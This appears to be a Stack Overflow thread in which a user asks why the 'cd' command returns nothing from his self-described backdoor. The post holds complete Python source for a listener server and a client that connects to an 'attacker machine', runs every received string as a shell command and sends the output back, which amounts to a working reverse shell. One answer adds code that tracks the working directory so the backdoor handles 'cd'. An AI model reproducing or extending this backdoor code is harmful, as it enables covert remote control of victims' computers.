-2

The backdoor is working successfully so far the client connects to the server the servers sends the command to the client the client sends the information from the command back to the server. But when i use the cd command the command output is not sent back to the server any ideas is it the sub process code in the client?

Here's my Server Code:

from socket import *
HOST = 'localhost'                 # '' means bind to all interfaces
PORT = 443                #  port
# create our socket handler
s = socket(AF_INET, SOCK_STREAM)
# set is so that when we cancel out we can reuse port
s.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
# bind to interface
s.bind((HOST, PORT))
# print we are accepting connections
print ("Listening on ")
print (HOST)
print(PORT)
# listen for only 10 connection
s.listen(10)
# accept connections
conn, addr = s.accept()
# print connected by ipaddress
print 'Connected by', addr

# receive initial connection
data = conn.recv(1024)

while True:
  task = raw_input("Enter the task needed")

  if task == "cmd":
      # start loop
      while True:
          command = raw_input("Enter shell command or quit: ")
          # send shell command
          conn.send(command)
          # receive output from linux command
          data = conn.recv(1024)
          # print the output of the linux command
          print data
          # if we specify quit then break out of loop and close socket

          if command == "quit": break   

# close socket
conn.close()

The Client Code:

    import socket,subprocess
HOST = 'localhost'    # The remote host
PORT = 443            # The same port as used by the server
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# connect to attacker machine
s.connect((HOST, PORT))
# send we are connected
s.send("Connection Established!")
while True:
     # recieve shell command
     data = s.recv(1024)
     # do shell command
     proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
     # read output
     stdout_value = proc.stdout.read() + proc.stderr.read()
     # send output to attacker
     s.send(stdout_value)

     # if its quit, then break out and close socket
     if data == "quit": break
# close socket
s.close()
ArK
  • 20,698
  • 67
  • 109
  • 136
Stegzy
  • 3
  • 2
  • Maybe this question helps http://stackoverflow.com/q/21406887/1741542 – Olaf Dietsche Dec 09 '16 at 21:57
  • The `cd` command doesn't have any output. Remember, if you `cd` in a subprocess shell, that change is only for the duration of the subprocess and isn't permanent for the parent process or any future subprocesses. – tdelaney Dec 09 '16 at 22:05
  • Thanks how would you say i should go about adding a cd command option – Stegzy Dec 09 '16 at 22:09

2 Answers2

0

Keep track of current directory separately and use it with your subprocess calls. I split the command processor out into a separate function that returns command output or None to quit. I took a wild guess and return the current directory on the cd command... you can change that as you like.

import re
import os

current_path = '.'

def run_command(data):
    global current_path
    if data.startswith("cd "):
        current_path = re.split(r'\w+', data)[1]
        return os.path.realpath(current_path) # what do you want to return here?
    elif data == "quit":
        return None  # check this in main program to quit
    else:
        proc = subprocess.Popen(data, shell=True, cwd=current_path,
            stdout=subprocess.PIPE, stderr=subprocess.PIPE, 
            stdin=subprocess.PIPE)
        out, err = proc.communicate()
        return out + err
tdelaney
  • 73,364
  • 6
  • 83
  • 116
0

when i use the cd command the command output is not sent back to the server

That's because the cd command produces no output (at least not if successful).

Armali
  • 18,255
  • 14
  • 57
  • 171